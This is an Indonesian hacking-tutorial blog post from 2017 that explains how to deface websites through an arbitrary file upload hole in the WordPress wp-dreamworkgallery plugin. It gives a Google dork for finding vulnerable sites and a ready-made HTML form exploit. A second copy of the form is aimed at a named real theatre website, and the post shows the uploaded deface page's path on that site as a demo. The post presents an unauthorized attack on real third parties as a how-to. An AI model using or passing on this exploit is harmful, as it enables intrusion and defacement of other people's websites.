Deface dengan Wordpress dreamwork_manage File Upload Vulnerability

Author : UnknownTidak ada komentar


Halo Sobat Apakabar? Langsung menuju tutor..

Elu Langsung menuju ke google.


DORKs  "inurl:/wp-content/plugins/wp-dreamworkgallery"

Pilih Salah Satu Website. 

Copas Exploit ini di notepad lalu save ex. html :

<form action="http://www.target.com//wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form>

www.target.com di isi sama web target... Contoh ini target gw

<form action="http://theatredumordant.fr//wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form>



Kayanya Shell ga bisa di upload di metode ini. jadi langsung aja upload file deface Elu. ex Html. Lalu submit.



Kalo Tampilan nya seperti itu biasanya vuln. Sekarang Cek file yg sudah kita upload tadi. Lihat gambar.. File ane ada di
/wp-content/uploads/dreamwork/480_uploadfolder/big/x.html 

Berarti begini http://theatredumordant.fr/wp-content/uploads/dreamwork/480_uploadfolder/big/x.html 


DEMO :

http://www.theatredumordant.fr/wp-content/plugins/wp-dreamworkgallery/xml/drm_all.xml


Artikel Terkait

Posted On : Rabu, 05 April 2017Time : April 05, 2017
SHARE TO :
| | Template Created By : Binkbenks | CopyRigt By : Tutorial Hacker | |
close
Banner iklan disini
> [Tutup]